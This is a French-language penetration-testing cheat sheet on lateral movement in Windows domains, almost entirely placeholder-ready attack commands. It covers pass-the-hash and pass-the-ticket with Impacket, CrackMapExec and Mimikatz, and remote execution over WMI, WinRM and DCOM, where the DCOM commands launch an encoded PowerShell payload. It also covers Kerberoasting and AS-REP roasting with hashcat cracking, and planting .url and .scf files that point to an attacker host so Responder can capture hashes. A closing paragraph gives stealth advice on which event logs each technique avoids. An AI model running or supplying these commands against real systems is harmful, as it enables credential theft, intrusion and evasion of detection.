--- title: "Lateral Movement" domain: security subdomain: pentest phase: 05-post-exploitation type: snippet tags: [lateral-movement, pth, pass-the-hash, psexec, wmi, winrm, impacket, pentest] difficulty: advanced status: stable updated: "2025-05-13" --- ## Pass-the-Hash (PtH) ```bash # Impacket — PsExec avec hash NTLM psexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}} # Impacket — WMIExec (moins de traces) wmiexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}} # Impacket — SMBExec smbexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}} # Impacket — ATExec (via Task Scheduler) atexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}} "whoami" # CrackMapExec — scan PtH en masse crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} -x "whoami" crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} --sam # xfreerdp — RDP avec hash (Restricted Admin Mode requis) xfreerdp /v:{{TARGET_IP}} /u:{{USER}} /pth:{{NTLM_HASH}} ``` ## Pass-the-Ticket (PtT) ```bash # Exporter les tickets depuis la mémoire (Mimikatz) mimikatz# sekurlsa::tickets /export # crée des fichiers .kirbi # Importer un ticket mimikatz# kerberos::ptt [0;12bd0]-0-0-40810000-{{USER}}@cifs-target.kirbi mimikatz# kerberos::ptt ticket.kirbi # Vérifier les tickets en mémoire mimikatz# kerberos::list klist # commande native Windows # Depuis Linux — convertir et utiliser ticketConverter.py ticket.kirbi ticket.ccache export KRB5CCNAME=ticket.ccache psexec.py -k -no-pass {{TARGET_DOMAIN}}/{{USER}}@{{TARGET}} # Overpass-the-Hash (NTLM → Ticket Kerberos) mimikatz# sekurlsa::pth /user:{{USER}} /ntlm:{{NTLM_HASH}} /domain:{{TARGET_DOMAIN}} /run:powershell.exe # Puis dans le nouveau processus : klist # vérifier les tickets générés ``` ## PsExec et variantes ```bash # Impacket PsExec (crée un service — bruyant, détecté par EDR) psexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}} # Sysinternals PsExec (natif) PsExec.exe \\{{TARGET_IP}} -u {{TARGET_DOMAIN}}\{{USER}} -p {{PASSWORD}} cmd.exe # SmbExec (pas de binaire déposé sur disque) smbexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}} ``` ## WMI ```bash # Impacket WMIExec (semi-interactif, sans service créé) wmiexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}} wmiexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}} "ipconfig /all" # PowerShell — WMI local Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt" # PowerShell — WMI distant $cred = Get-Credential Invoke-WmiMethod -ComputerName {{TARGET_IP}} -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt" [wmi]"\\{{TARGET_IP}}\root\cimv2:Win32_Process" | Invoke-WmiMethod -Name Create -ArgumentList "cmd.exe" ``` ## WinRM / PowerShell Remoting ```bash # Depuis Linux evil-winrm -i {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} evil-winrm -i {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}} # Depuis Windows Enter-PSSession -ComputerName {{TARGET_IP}} -Credential (Get-Credential) Invoke-Command -ComputerName {{TARGET_IP}} -Credential (Get-Credential) -ScriptBlock { whoami; hostname } # CrackMapExec crackmapexec winrm {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} -x "whoami" crackmapexec winrm {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}} -x "whoami" ``` ## DCOM ```powershell # MMC20.Application (port 135) $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","{{TARGET_IP}}")) $dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c powershell -e {{B64_PAYLOAD}}","7") # ShellWindows $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application","{{TARGET_IP}}")) $dcom.ShellExecute("cmd.exe","/c powershell -e {{B64_PAYLOAD}}","C:\Windows\System32","",0) ``` ## Kerberoasting ```bash # GetUserSPNs — depuis Linux GetUserSPNs.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request GetUserSPNs.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -outputfile kerberoast.txt # PowerView — depuis Windows Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv kerberoast.csv -NoTypeInformation Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File kerberoast.txt # Crack hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule ``` ## ASREPRoasting ```bash # GetNPUsers — comptes sans pré-auth Kerberos requise GetNPUsers.py {{TARGET_DOMAIN}}/ -dc-ip {{TARGET_IP}} -usersfile users.txt -format hashcat GetNPUsers.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -format hashcat # PowerView Get-DomainUser -PreauthNotRequired | Get-ASREPHash -Format Hashcat | Out-File asrep.txt # Crack AS-REP hash (mode 18200) hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt ``` ## Mouvement latéral via partages ```bash # Trouver les partages avec accès en écriture crackmapexec smb {{TARGET}}/24 -u {{USER}} -p {{PASSWORD}} --shares # Déposer un fichier pour vol de hash (Responder) # Créer un fichier @malicious.url ou desktop.ini dans un partage partagé echo "[InternetShortcut] URL=file://{{LHOST}}/x" > @capture.url # SCF file (dans un partage) echo "[Shell] Command=2 IconFile=\\{{LHOST}}\share\icon.ico" > @loot.scf # Intercepter avec Responder responder -I {{INTERFACE}} -wrf ``` WMIExec et ATExec sont plus discrets que PsExec car ils ne créent pas de service Windows (Event ID 7045). Evil-WinRM laisse des traces dans les logs PowerShell Remoting (Event ID 4103/4104). Le mouvement le plus furtif reste PtT avec un ticket valide — aucun nouveau processus créé.